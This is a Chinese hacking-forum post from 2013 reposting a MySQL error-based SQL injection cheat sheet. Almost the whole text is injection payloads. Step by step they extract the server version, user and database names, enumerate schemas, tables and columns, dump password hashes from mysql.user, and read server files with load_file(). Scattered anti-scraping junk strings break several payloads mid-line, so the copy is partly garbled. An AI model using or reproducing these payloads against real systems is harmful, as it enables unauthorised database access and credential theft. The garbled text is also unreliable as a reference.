Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
9 Y; L0 Z+ D2 u2 Z/ E7 R4 y

Mysql暴错注入参考（pdf），每天一贴。。。

MySql Error Based Injection Reference
1 O# X$ d8 c4 t5 X4 m# `3 i3 |, d. s" J[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
  [" F+ ^" J# c# n, [TeAm:http://www.FreeBuf.com/
: r0 b8 z( y1 K8 ]Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
1 |, y# T6 ~3 S6 L- ]0 }% L小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
4 g9 D  g  X' \  RMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
' O( |- g. J3 n7 f- CMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
  j& j+ T, F7 F' `- D$ q. aand(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
8 T* g4 J* a4 M" G" E8 h$ K, v5 YMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
$ J  o# a' y( [) b: R9 U* ]依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
2 i% d1 H2 e5 F; V$ x9 R依次爆表:
; v1 t" F3 O5 S! [9 A2 Pand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
5 J% ?: B: |, `2 E3 K$ `. o6 Z& nable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
: j+ Y; V/ ?$ L% \bles+group+by+x)a)+and+1=1
) y9 B( g% U$ R) Z: i9 j" b  G0x6D7973716C=Mysql 将n顺序替换
0 G! J% i1 o. t/ h爆表内字段数目:
* C: A* c; L% X6 N8 W7 T6 F: \* Rand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
6 s6 _' @8 _+ u5 v0 v8 l+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
" d( i# `$ y) A3 t  w1 E# m7 A( Z0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0 o  f8 O5 {' N) B依次爆字段:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
8 u9 P" L+ o" v2 J9 i依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
% I% Z& i( ]7 V- V+ v# I将n顺序替换
3 e  o9 k% \) ?, ^% a爆文件内容:
! S3 v. V. z- ?/ e  M% O$ O# |; Hand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
8 `; Z! x+ U2 r7 M) \from+information_schema.tables+group+by+a)b)
) U( o# b3 z2 k! `4 G( z2 _0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
* A5 _" {: U8 OThx for reading.

不要下载也可以，
6 N1 |- H! T6 |" {$ H1 L